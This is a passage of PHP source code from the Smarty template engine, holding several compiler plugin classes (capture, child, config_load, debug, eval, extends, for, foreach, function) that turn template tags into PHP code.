        foreach ($_attr as $_key => $_value) {
            if (is_int($_key)) {
                $_paramsArray[] = "$_key=>$_value";
            } else {
                $_paramsArray[] = "'$_key'=>$_value";
            }
        }
        $_params = 'array(' . implode(',', $_paramsArray) . ')';
        //$compiler->suppressNocacheProcessing = true;
        // was there an assign attribute
        if (isset($_assign)) {
            $_output =
                "<?php ob_start();\n\$_smarty_tpl->smarty->ext->_tplFunction->callTemplateFunction(\$_smarty_tpl, {$_name}, {$_params}, {$_nocache});\n\$_smarty_tpl->assign({$_assign}, ob_get_clean());?>\n";
        } else {
            $_output =
                "<?php \$_smarty_tpl->smarty->ext->_tplFunction->callTemplateFunction(\$_smarty_tpl, {$_name}, {$_params}, {$_nocache});?>\n";
        }
        return $_output;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Capture
 * Compiles the {capture} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Capture Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Capture extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('name');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('name', 'assign', 'append');

    /**
     * Compiles code for the {$smarty.capture.xxx}
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return string compiled code
     */
    public static function compileSpecialVariable(
        $args,
        Smarty_Internal_TemplateCompilerBase $compiler,
        $parameter = null
    ) {
        return '$_smarty_tpl->smarty->ext->_capture->getBuffer($_smarty_tpl' .
               (isset($parameter[ 1 ]) ? ", {$parameter[ 1 ]})" : ')');
    }

    /**
     * Compiles code for the {capture} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     * @param null                                  $parameter
     *
     * @return string compiled code
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter = null)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args, $parameter, 'capture');
        $buffer = isset($_attr[ 'name' ]) ? $_attr[ 'name' ] : "'default'";
        $assign = isset($_attr[ 'assign' ]) ? $_attr[ 'assign' ] : 'null';
        $append = isset($_attr[ 'append' ]) ? $_attr[ 'append' ] : 'null';
        $compiler->_cache[ 'capture_stack' ][] = array($compiler->nocache);
        // maybe nocache because of nocache variables
        $compiler->nocache = $compiler->nocache | $compiler->tag_nocache;
        $_output = "<?php \$_smarty_tpl->smarty->ext->_capture->open(\$_smarty_tpl, $buffer, $assign, $append);?>";
        return $_output;
    }
}

/**
 * Smarty Internal Plugin Compile Captureclose Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_CaptureClose extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {/capture} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     * @param null                                  $parameter
     *
     * @return string compiled code
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args, $parameter, '/capture');
        // must endblock be nocache?
        if ($compiler->nocache) {
            $compiler->tag_nocache = true;
        }
        list($compiler->nocache) = array_pop($compiler->_cache[ 'capture_stack' ]);
        return "<?php \$_smarty_tpl->smarty->ext->_capture->close(\$_smarty_tpl);?>";
    }
}
<?php
/**
 * This file is part of Smarty.
 *
 * (c) 2015 Uwe Tews
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/**
 * Smarty Internal Plugin Compile Child Class
 *
 * @author Uwe Tews <uwe.tews@googlemail.com>
 */
class Smarty_Internal_Compile_Child extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('assign');

    /**
     * Tag name
     *
     * @var string
     */
    public $tag = 'child';

    /**
     * Block type
     *
     * @var string
     */
    public $blockType = 'Child';

    /**
     * Compiles code for the {child} tag
     *
     * @param array                                 $args      array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler  compiler object
     * @param array                                 $parameter array with compilation parameter
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler, $parameter)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        $tag = isset($parameter[ 0 ]) ? "'{$parameter[0]}'" : "'{{$this->tag}}'";
        if (!isset($compiler->_cache[ 'blockNesting' ])) {
            $compiler->trigger_template_error(
                "{$tag} used outside {block} tags ",
                $compiler->parser->lex->taglineno
            );
        }
        $compiler->has_code = true;
        $compiler->suppressNocacheProcessing = true;
        if ($this->blockType === 'Child') {
            $compiler->_cache[ 'blockParams' ][ $compiler->_cache[ 'blockNesting' ] ][ 'callsChild' ] = 'true';
        }
        $_assign = isset($_attr[ 'assign' ]) ? $_attr[ 'assign' ] : null;
        $output = "<?php \n";
        if (isset($_assign)) {
            $output .= "ob_start();\n";
        }
        $output .= '$_smarty_tpl->inheritance->call' . $this->blockType . '($_smarty_tpl, $this' .
                   ($this->blockType === 'Child' ? '' : ", {$tag}") . ");\n";
        if (isset($_assign)) {
            $output .= "\$_smarty_tpl->assign({$_assign}, ob_get_clean());\n";
        }
        $output .= "?>\n";
        return $output;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Config Load
 * Compiles the {config load} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Config Load Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Config_Load extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $required_attributes = array('file');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('file', 'section');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('section', 'scope');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $option_flags = array('nocache', 'noscope');

    /**
     * Valid scope names
     *
     * @var array
     */
    public $valid_scopes = array(
        'local'  => Smarty::SCOPE_LOCAL, 'parent' => Smarty::SCOPE_PARENT,
        'root'   => Smarty::SCOPE_ROOT, 'tpl_root' => Smarty::SCOPE_TPL_ROOT,
        'smarty' => Smarty::SCOPE_SMARTY, 'global' => Smarty::SCOPE_SMARTY
    );

    /**
     * Compiles code for the {config_load} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        if ($_attr[ 'nocache' ] === true) {
            $compiler->trigger_template_error('nocache option not allowed', null, true);
        }
        // save possible attributes
        $conf_file = $_attr[ 'file' ];
        if (isset($_attr[ 'section' ])) {
            $section = $_attr[ 'section' ];
        } else {
            $section = 'null';
        }
        // scope setup
        if ($_attr[ 'noscope' ]) {
            $_scope = -1;
        } else {
            $_scope = $compiler->convertScope($_attr, $this->valid_scopes);
        }
        // create config object
        $_output =
            "<?php\n\$_smarty_tpl->smarty->ext->configLoad->_loadConfigFile(\$_smarty_tpl, {$conf_file}, {$section}, {$_scope});\n?>\n";
        return $_output;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Continue
 * Compiles the {continue} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Continue Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Continue extends Smarty_Internal_Compile_Break
{
    /**
     * Tag name
     *
     * @var string
     */
    public $tag = 'continue';
}
<?php
/**
 * Smarty Internal Plugin Compile Debug
 * Compiles the {debug} tag.
 * It opens a window the the Smarty Debugging Console.
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Debug Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Debug extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {debug} tag
     *
     * @param array  $args     array with attributes from parser
     * @param object $compiler compiler object
     *
     * @return string compiled code
     */
    public function compile($args, $compiler)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        // compile always as nocache
        $compiler->tag_nocache = true;
        // display debug template
        $_output =
            "<?php \$_smarty_debug = new Smarty_Internal_Debug;\n \$_smarty_debug->display_debug(\$_smarty_tpl);\n";
        $_output .= "unset(\$_smarty_debug);\n?>";
        return $_output;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Eval
 * Compiles the {eval} tag.
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Eval Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Eval extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $required_attributes = array('var');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('assign');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('var', 'assign');

    /**
     * Compiles code for the {eval} tag
     *
     * @param array  $args     array with attributes from parser
     * @param object $compiler compiler object
     *
     * @return string compiled code
     */
    public function compile($args, $compiler)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        if (isset($_attr[ 'assign' ])) {
            // output will be stored in a smarty variable instead of being displayed
            $_assign = $_attr[ 'assign' ];
        }
        // create template object
        $_output =
            "\$_template = new {$compiler->smarty->template_class}('eval:'.{$_attr[ 'var' ]}, \$_smarty_tpl->smarty, \$_smarty_tpl);";
        //was there an assign attribute?
        if (isset($_assign)) {
            $_output .= "\$_smarty_tpl->assign($_assign,\$_template->fetch());";
        } else {
            $_output .= 'echo $_template->fetch();';
        }
        return "<?php $_output ?>";
    }
}
<?php
/**
 * Smarty Internal Plugin Compile extend
 * Compiles the {extends} tag
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile extend Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Extends extends Smarty_Internal_Compile_Shared_Inheritance
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $required_attributes = array('file');

    /**
     * Array of names of optional attribute required by tag
     * use array('_any') if there is no restriction of attributes names
     *
     * @var array
     */
    public $optional_attributes = array();

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('file');

    /**
     * Compiles code for the {extends} tag extends: resource
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     * @throws \SmartyException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        if ($_attr[ 'nocache' ] === true) {
            $compiler->trigger_template_error('nocache option not allowed', $compiler->parser->lex->line - 1);
        }
        if (strpos($_attr[ 'file' ], '$_tmp') !== false) {
            $compiler->trigger_template_error('illegal value for file attribute', $compiler->parser->lex->line - 1);
        }
        // add code to initialize inheritance
        $this->registerInit($compiler, true);
        $this->compileEndChild($compiler, $_attr[ 'file' ]);
        $compiler->has_code = false;
        return '';
    }

    /**
     * Add code for inheritance endChild() method to end of template
     *
     * @param \Smarty_Internal_TemplateCompilerBase $compiler
     * @param null|string                           $template optional inheritance parent template
     *
     * @throws \SmartyCompilerException
     * @throws \SmartyException
     */
    private function compileEndChild(Smarty_Internal_TemplateCompilerBase $compiler, $template = null)
    {
        $inlineUids = '';
        if (isset($template) && $compiler->smarty->merge_compiled_includes) {
            $code = $compiler->compileTag('include', array($template, array('scope' => 'parent')));
            if (preg_match('/([,][\s]*[\'][a-z0-9]+[\'][,][\s]*[\']content.*[\'])[)]/', $code, $match)) {
                $inlineUids = $match[ 1 ];
            }
        }
        $compiler->parser->template_postfix[] = new Smarty_Internal_ParseTree_Tag(
            $compiler->parser,
            '<?php $_smarty_tpl->inheritance->endChild($_smarty_tpl' .
            (isset($template) ?
                ", {$template}{$inlineUids}" :
                '') . ");\n?>"
        );
    }
}
<?php
/**
 * Smarty Internal Plugin Compile For
 * Compiles the {for} {forelse} {/for} tags
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile For Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_For extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {for} tag
     * Smarty supports two different syntax's:
     * - {for $var in $array}
     * For looping over arrays or iterators
     * - {for $x=0; $x<$y; $x++}
     * For general loops
     * The parser is generating different sets of attribute by which this compiler can
     * determine which syntax is used.
     *
     * @param array  $args      array with attributes from parser
     * @param object $compiler  compiler object
     * @param array  $parameter array with compilation parameter
     *
     * @return string compiled code
     */
    public function compile($args, $compiler, $parameter)
    {
        $compiler->loopNesting++;
        if ($parameter === 0) {
            $this->required_attributes = array('start', 'to');
            $this->optional_attributes = array('max', 'step');
        } else {
            $this->required_attributes = array('start', 'ifexp', 'var', 'step');
            $this->optional_attributes = array();
        }
        $this->mapCache = array();
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        $output = "<?php\n";
        if ($parameter === 1) {
            foreach ($_attr[ 'start' ] as $_statement) {
                if (is_array($_statement[ 'var' ])) {
                    $var = $_statement[ 'var' ][ 'var' ];
                    $index = $_statement[ 'var' ][ 'smarty_internal_index' ];
                } else {
                    $var = $_statement[ 'var' ];
                    $index = '';
                }
                $output .= "\$_smarty_tpl->tpl_vars[$var] = new Smarty_Variable(null, \$_smarty_tpl->isRenderingCache);\n";
                $output .= "\$_smarty_tpl->tpl_vars[$var]->value{$index} = {$_statement['value']};\n";
            }
            if (is_array($_attr[ 'var' ])) {
                $var = $_attr[ 'var' ][ 'var' ];
                $index = $_attr[ 'var' ][ 'smarty_internal_index' ];
            } else {
                $var = $_attr[ 'var' ];
                $index = '';
            }
            $output .= "if ($_attr[ifexp]) {\nfor (\$_foo=true;$_attr[ifexp]; \$_smarty_tpl->tpl_vars[$var]->value{$index}$_attr[step]) {\n";
        } else {
            $_statement = $_attr[ 'start' ];
            if (is_array($_statement[ 'var' ])) {
                $var = $_statement[ 'var' ][ 'var' ];
                $index = $_statement[ 'var' ][ 'smarty_internal_index' ];
            } else {
                $var = $_statement[ 'var' ];
                $index = '';
            }
            $output .= "\$_smarty_tpl->tpl_vars[$var] = new Smarty_Variable(null, \$_smarty_tpl->isRenderingCache);";
            if (isset($_attr[ 'step' ])) {
                $output .= "\$_smarty_tpl->tpl_vars[$var]->step = $_attr[step];";
            } else {
                $output .= "\$_smarty_tpl->tpl_vars[$var]->step = 1;";
            }
            if (isset($_attr[ 'max' ])) {
                $output .= "\$_smarty_tpl->tpl_vars[$var]->total = (int) min(ceil((\$_smarty_tpl->tpl_vars[$var]->step > 0 ? $_attr[to]+1 - ($_statement[value]) : $_statement[value]-($_attr[to])+1)/abs(\$_smarty_tpl->tpl_vars[$var]->step)),$_attr[max]);\n";
            } else {
                $output .= "\$_smarty_tpl->tpl_vars[$var]->total = (int) ceil((\$_smarty_tpl->tpl_vars[$var]->step > 0 ? $_attr[to]+1 - ($_statement[value]) : $_statement[value]-($_attr[to])+1)/abs(\$_smarty_tpl->tpl_vars[$var]->step));\n";
            }
            $output .= "if (\$_smarty_tpl->tpl_vars[$var]->total > 0) {\n";
            $output .= "for (\$_smarty_tpl->tpl_vars[$var]->value{$index} = $_statement[value], \$_smarty_tpl->tpl_vars[$var]->iteration = 1;\$_smarty_tpl->tpl_vars[$var]->iteration <= \$_smarty_tpl->tpl_vars[$var]->total;\$_smarty_tpl->tpl_vars[$var]->value{$index} += \$_smarty_tpl->tpl_vars[$var]->step, \$_smarty_tpl->tpl_vars[$var]->iteration++) {\n";
            $output .= "\$_smarty_tpl->tpl_vars[$var]->first = \$_smarty_tpl->tpl_vars[$var]->iteration === 1;";
            $output .= "\$_smarty_tpl->tpl_vars[$var]->last = \$_smarty_tpl->tpl_vars[$var]->iteration === \$_smarty_tpl->tpl_vars[$var]->total;";
        }
        $output .= '?>';
        $this->openTag($compiler, 'for', array('for', $compiler->nocache));
        // maybe nocache because of nocache variables
        $compiler->nocache = $compiler->nocache | $compiler->tag_nocache;
        // return compiled code
        return $output;
    }
}

/**
 * Smarty Internal Plugin Compile Forelse Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Forelse extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {forelse} tag
     *
     * @param array  $args      array with attributes from parser
     * @param object $compiler  compiler object
     * @param array  $parameter array with compilation parameter
     *
     * @return string compiled code
     */
    public function compile($args, $compiler, $parameter)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        list($openTag, $nocache) = $this->closeTag($compiler, array('for'));
        $this->openTag($compiler, 'forelse', array('forelse', $nocache));
        return "<?php }} else { ?>";
    }
}

/**
 * Smarty Internal Plugin Compile Forclose Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Forclose extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {/for} tag
     *
     * @param array  $args      array with attributes from parser
     * @param object $compiler  compiler object
     * @param array  $parameter array with compilation parameter
     *
     * @return string compiled code
     */
    public function compile($args, $compiler, $parameter)
    {
        $compiler->loopNesting--;
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        // must endblock be nocache?
        if ($compiler->nocache) {
            $compiler->tag_nocache = true;
        }
        list($openTag, $compiler->nocache) = $this->closeTag($compiler, array('for', 'forelse'));
        $output = "<?php }\n";
        if ($openTag !== 'forelse') {
            $output .= "}\n";
        }
        $output .= "?>";
        return $output;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Foreach
 * Compiles the {foreach} {foreachelse} {/foreach} tags
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Foreach Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Foreach extends Smarty_Internal_Compile_Private_ForeachSection
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $required_attributes = array('from', 'item');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('name', 'key', 'properties');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('from', 'item', 'key', 'name');

    /**
     * counter
     *
     * @var int
     */
    public $counter = 0;

    /**
     * Name of this tag
     *
     * @var string
     */
    public $tagName = 'foreach';

    /**
     * Valid properties of $smarty.foreach.name.xxx variable
     *
     * @var array
     */
    public $nameProperties = array('first', 'last', 'index', 'iteration', 'show', 'total');

    /**
     * Valid properties of $item@xxx variable
     *
     * @var array
     */
    public $itemProperties = array('first', 'last', 'index', 'iteration', 'show', 'total', 'key');

    /**
     * Flag if tag had name attribute
     *
     * @var bool
     */
    public $isNamed = false;

    /**
     * Compiles code for the {foreach} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     * @throws \SmartyException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $compiler->loopNesting++;
        // init
        $this->isNamed = false;
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        $from = $_attr[ 'from' ];
        $item = $compiler->getId($_attr[ 'item' ]);
        if ($item === false) {
            $item = $compiler->getVariableName($_attr[ 'item' ]);
        }
        $key = $name = null;
        $attributes = array('item' => $item);
        if (isset($_attr[ 'key' ])) {
            $key = $compiler->getId($_attr[ 'key' ]);
            if ($key === false) {
                $key = $compiler->getVariableName($_attr[ 'key' ]);
            }
            $attributes[ 'key' ] = $key;
        }
        if (isset($_attr[ 'name' ])) {
            $this->isNamed = true;
            $name = $attributes[ 'name' ] = $compiler->getId($_attr[ 'name' ]);
        }
        foreach ($attributes as $a => $v) {
            if ($v === false) {
                $compiler->trigger_template_error("'{$a}' attribute/variable has illegal value", null, true);
            }
        }
        $fromName = $compiler->getVariableName($_attr[ 'from' ]);
        if ($fromName) {
            foreach (array('item', 'key') as $a) {
                if (isset($attributes[ $a ]) && $attributes[ $a ] === $fromName) {
                    $compiler->trigger_template_error(
                        "'{$a}' and 'from' may not have same variable name '{$fromName}'",
                        null,
                        true
                    );
                }
            }
        }
        $itemVar = "\$_smarty_tpl->tpl_vars['{$item}']";
        $local = '$__foreach_' . $attributes[ 'item' ] . '_' . $this->counter++ . '_';
        // search for used tag attributes
        $itemAttr = array();
        $namedAttr = array();
        $this->scanForProperties($attributes, $compiler);
        if (!empty($this->matchResults[ 'item' ])) {
            $itemAttr = $this->matchResults[ 'item' ];
        }
        if (!empty($this->matchResults[ 'named' ])) {
            $namedAttr = $this->matchResults[ 'named' ];
        }
        if (isset($_attr[ 'properties' ]) && preg_match_all('/[\'](.*?)[\']/', $_attr[ 'properties' ], $match)) {
            foreach ($match[ 1 ] as $prop) {
                if (in_array($prop, $this->itemProperties)) {
                    $itemAttr[ $prop ] = true;
                } else {
                    $compiler->trigger_template_error("Invalid property '{$prop}'", null, true);
                }
            }
            if ($this->isNamed) {
                foreach ($match[ 1 ] as $prop) {
                    if (in_array($prop, $this->nameProperties)) {
                        $nameAttr[ $prop ] = true;
                    } else {
                        $compiler->trigger_template_error("Invalid property '{$prop}'", null, true);
                    }
                }
            }
        }
        if (isset($itemAttr[ 'first' ])) {
            $itemAttr[ 'index' ] = true;
        }
        if (isset($namedAttr[ 'first' ])) {
            $namedAttr[ 'index' ] = true;
        }
        if (isset($namedAttr[ 'last' ])) {
            $namedAttr[ 'iteration' ] = true;
            $namedAttr[ 'total' ] = true;
        }
        if (isset($itemAttr[ 'last' ])) {
            $itemAttr[ 'iteration' ] = true;
            $itemAttr[ 'total' ] = true;
        }
        if (isset($namedAttr[ 'show' ])) {
            $namedAttr[ 'total' ] = true;
        }
        if (isset($itemAttr[ 'show' ])) {
            $itemAttr[ 'total' ] = true;
        }
        $keyTerm = '';
        if (isset($attributes[ 'key' ])) {
            $keyTerm = "\$_smarty_tpl->tpl_vars['{$key}']->value => ";
        }
        if (isset($itemAttr[ 'key' ])) {
            $keyTerm = "{$itemVar}->key => ";
        }
        if ($this->isNamed) {
            $foreachVar = "\$_smarty_tpl->tpl_vars['__smarty_foreach_{$attributes['name']}']";
        }
        $needTotal = isset($itemAttr[ 'total' ]);
        // Register tag
        $this->openTag(
            $compiler,
            'foreach',
            array('foreach', $compiler->nocache, $local, $itemVar, empty($itemAttr) ? 1 : 2)
        );
        // maybe nocache because of nocache variables
        $compiler->nocache = $compiler->nocache | $compiler->tag_nocache;
        // generate output code
        $output = "<?php\n";
        $output .= "\$_from = \$_smarty_tpl->smarty->ext->_foreach->init(\$_smarty_tpl, $from, " .
                   var_export($item, true);
        if ($name || $needTotal || $key) {
            $output .= ', ' . var_export($needTotal, true);
        }
        if ($name || $key) {
            $output .= ', ' . var_export($key, true);
        }
        if ($name) {
            $output .= ', ' . var_export($name, true) . ', ' . var_export($namedAttr, true);
        }
        $output .= ");\n";
        if (isset($itemAttr[ 'show' ])) {
            $output .= "{$itemVar}->show = ({$itemVar}->total > 0);\n";
        }
        if (isset($itemAttr[ 'iteration' ])) {
            $output .= "{$itemVar}->iteration = 0;\n";
        }
        if (isset($itemAttr[ 'index' ])) {
            $output .= "{$itemVar}->index = -1;\n";
        }
        $output .= "{$itemVar}->do_else = true;\n";
        $output .= "if (\$_from !== null) foreach (\$_from as {$keyTerm}{$itemVar}->value) {\n";
        $output .= "{$itemVar}->do_else = false;\n";
        if (isset($attributes[ 'key' ]) && isset($itemAttr[ 'key' ])) {
            $output .= "\$_smarty_tpl->tpl_vars['{$key}']->value = {$itemVar}->key;\n";
        }
        if (isset($itemAttr[ 'iteration' ])) {
            $output .= "{$itemVar}->iteration++;\n";
        }
        if (isset($itemAttr[ 'index' ])) {
            $output .= "{$itemVar}->index++;\n";
        }
        if (isset($itemAttr[ 'first' ])) {
            $output .= "{$itemVar}->first = !{$itemVar}->index;\n";
        }
        if (isset($itemAttr[ 'last' ])) {
            $output .= "{$itemVar}->last = {$itemVar}->iteration === {$itemVar}->total;\n";
        }
        if (isset($foreachVar)) {
            if (isset($namedAttr[ 'iteration' ])) {
                $output .= "{$foreachVar}->value['iteration']++;\n";
            }
            if (isset($namedAttr[ 'index' ])) {
                $output .= "{$foreachVar}->value['index']++;\n";
            }
            if (isset($namedAttr[ 'first' ])) {
                $output .= "{$foreachVar}->value['first'] = !{$foreachVar}->value['index'];\n";
            }
            if (isset($namedAttr[ 'last' ])) {
                $output .= "{$foreachVar}->value['last'] = {$foreachVar}->value['iteration'] === {$foreachVar}->value['total'];\n";
            }
        }
        if (!empty($itemAttr)) {
            $output .= "{$local}saved = {$itemVar};\n";
        }
        $output .= '?>';
        return $output;
    }

    /**
     * Compiles code for to restore saved template variables
     *
     * @param int $levels number of levels to restore
     *
     * @return string compiled code
     */
    public function compileRestore($levels)
    {
        return "\$_smarty_tpl->smarty->ext->_foreach->restore(\$_smarty_tpl, {$levels});";
    }
}

/**
 * Smarty Internal Plugin Compile Foreachelse Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Foreachelse extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {foreachelse} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        list($openTag, $nocache, $local, $itemVar, $restore) = $this->closeTag($compiler, array('foreach'));
        $this->openTag($compiler, 'foreachelse', array('foreachelse', $nocache, $local, $itemVar, 0));
        $output = "<?php\n";
        if ($restore === 2) {
            $output .= "{$itemVar} = {$local}saved;\n";
        }
        $output .= "}\nif ({$itemVar}->do_else) {\n?>";
        return $output;
    }
}

/**
 * Smarty Internal Plugin Compile Foreachclose Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Foreachclose extends Smarty_Internal_CompileBase
{
    /**
     * Compiles code for the {/foreach} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return string compiled code
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        $compiler->loopNesting--;
        // must endblock be nocache?
        if ($compiler->nocache) {
            $compiler->tag_nocache = true;
        }
        list(
            $openTag, $compiler->nocache, $local, $itemVar, $restore
            ) = $this->closeTag($compiler, array('foreach', 'foreachelse'));
        $output = "<?php\n";
        if ($restore === 2) {
            $output .= "{$itemVar} = {$local}saved;\n";
        }
        $output .= "}\n";
        /* @var Smarty_Internal_Compile_Foreach $foreachCompiler */
        $foreachCompiler = $compiler->getTagCompiler('foreach');
        $output .= $foreachCompiler->compileRestore(1);
        $output .= "?>";
        return $output;
    }
}
<?php
/**
 * Smarty Internal Plugin Compile Function
 * Compiles the {function} {/function} tags
 *
 * @package    Smarty
 * @subpackage Compiler
 * @author     Uwe Tews
 */

/**
 * Smarty Internal Plugin Compile Function Class
 *
 * @package    Smarty
 * @subpackage Compiler
 */
class Smarty_Internal_Compile_Function extends Smarty_Internal_CompileBase
{
    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $required_attributes = array('name');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $shorttag_order = array('name');

    /**
     * Attribute definition: Overwrites base class.
     *
     * @var array
     * @see Smarty_Internal_CompileBase
     */
    public $optional_attributes = array('_any');

    /**
     * Compiles code for the {function} tag
     *
     * @param array                                 $args     array with attributes from parser
     * @param \Smarty_Internal_TemplateCompilerBase $compiler compiler object
     *
     * @return bool true
     * @throws \SmartyCompilerException
     */
    public function compile($args, Smarty_Internal_TemplateCompilerBase $compiler)
    {
        // check and get attributes
        $_attr = $this->getAttributes($compiler, $args);
        if ($_attr[ 'nocache' ] === true) {
            $compiler->trigger_template_error('nocache option not allowed', null, true);
        }
        unset($_attr[ 'nocache' ]);
        $_name = trim($_attr[ 'name' ], '\'"');

        if (!preg_match('/^[a-zA-Z0-9_\x80-\xff]+$/', $_name)) {
